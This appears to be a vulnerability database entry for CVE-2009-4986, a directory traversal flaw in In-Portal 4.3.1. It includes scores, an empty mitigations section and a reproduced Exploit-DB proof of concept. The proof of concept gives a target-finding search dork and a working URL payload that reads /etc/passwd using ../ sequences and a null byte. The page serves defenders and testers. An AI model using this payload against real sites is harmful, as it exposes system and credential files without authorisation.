CVE-2009-4986

medium

Published 2010-08-25 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

7.8

Description

Directory traversal vulnerability in index.php in In-Portal 4.3.1, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the env parameter.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-9358 webapps php verified text · 2 KB

Angela Chang · 2009-08-04

In-portal 4.3.1 - 'index.php?env' Local File Inclusion

text exploit Source: Exploit-DB

 @ ===================================================================================@
/                      Title    : Local File Inclusion Vulnerability                   \
                       Software : In-Portal 4.3.1
                       Vendor   : http://www.in-portal.net/                    
[-]                                                                                    [-]
                       Date     : 01 August 2009 (Indonesia)
                       Author   : Angela Chang
                       Contact  : mizz_4ng3l@yahoo.com
\                                                                                      /
 @ ===================================================================================@
                                                                                                                                                                                             
 [-] Dork                                                                                                                                                                                    
 
     "Powered by In-portal"
 
 [-] Exploit                                                                                                                                                                                
 
     http://[site]/[path]/index.php?env=-/[LFI]%00
 
 [-] Demo                                                                                                                                                                                    
 
     http://www.in-portal.net/demo/index.php?env=-/../../../../../../../../../../../../../../../etc/passwd%00
                                                                                                                                                                                                  
{o} ==================================================================================={o}
 
                                                 Greetz   :   -:-  SkyCreW  -:-
 
     Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf ,   home_edition2001   ,   str0ke
 
 
{o}===================================================================================={o}
 
 
{o}===================================================================================={o} 

# milw0rm.com [2009-08-04]

Application impact

Vendor	Product	Versions	Fixed
in-portal	in-portal	`4.3.1`

References

CWEs

CWE-22

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.